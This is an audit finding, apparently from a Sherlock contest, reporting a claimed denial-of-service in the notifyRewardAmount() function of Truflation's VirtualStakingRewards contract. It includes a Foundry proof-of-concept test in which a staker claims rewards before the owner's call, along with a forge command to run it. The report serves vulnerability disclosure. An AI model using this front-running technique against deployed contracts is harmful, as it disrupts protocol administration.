Perfect Lemonade Bison

high

# Changing reward  allocation may always revert when calling notifyRewardAmount()  resulting a system DOS

## Summary

In VirtualStakingRewards, the function notifyRewardAmount() allows a privileged address to modify the rewardRate, which represents the number of tokens users receive after staking for a specific period. However, this function depends on an unsafe method of checking the balance:
```solidity
 uint256 balance = IERC20(rewardsToken).balanceOf(address(this));
```
A malicious actor could exploit this vulnerability to the contract's disadvantage by conducting a Denial-of-Service attack, causing the notifyRewardAmount() function to consistently revert.

## Vulnerability Detail

Given that anyone can claim rewards at any point, a malicious user who has been staking within the protocol can execute the claimReward function just before the admin triggers notifyRewardAmount. This action can be accomplished through front-running this transaction as well.

In this proof of concept, we can observe how an attacker can perform a DOS attack on this function.
```solidity
    function testNotifyRewardAmountDOS() external {
        vm.startPrank(alice);
       
        uint256 amount = 100e18;
        uint256 duration = 30 days;
       trufToken.approve(address(veTRUF), amount);
       veTRUF.stake(amount, duration, alice);

       trufToken.balanceOf(address(trufStakingRewards)); //200e18 since on setUp() we transfer 200 tokens to this address 

        vm.warp(block.timestamp + 10 days);
        veTRUF.claimReward();

        vm.stopPrank();
        vm.startPrank(owner);

        trufStakingRewards.notifyRewardAmount(100e18);// owner want to change and reduce the amount of rewards
        trufToken.balanceOf(address(trufStakingRewards)); // less than 100e18 since we claimed our rewards before the notifyRewardAmount tx
        
        vm.stopPrank();
    }
```
You can include this test in VotingEscrowTrufTest; it consistently fails due to the insufficient amount of reward tokens in the contract compared to the specified reward amount.

To run the test use 
```bash
forge test --match-contract VotingEscrowTrufTest --match-test testNotifyRewardAmountDOS 
```
## Impact
The contract's admin is unable to modify the reward amount.

## Code Snippet

https://github.com/sherlock-audit/2023-12-truflation/blob/main/truflation-contracts/src/staking/VirtualStakingRewards.sol#L144-L165

## Tool used

Manual Review

## Recommendation
When opting to utilize balanceOf, it's crucial to consistently verify that the quantity of reward tokens within the contract exceeds the intended notification amount, even when decreasing the reward allocation.
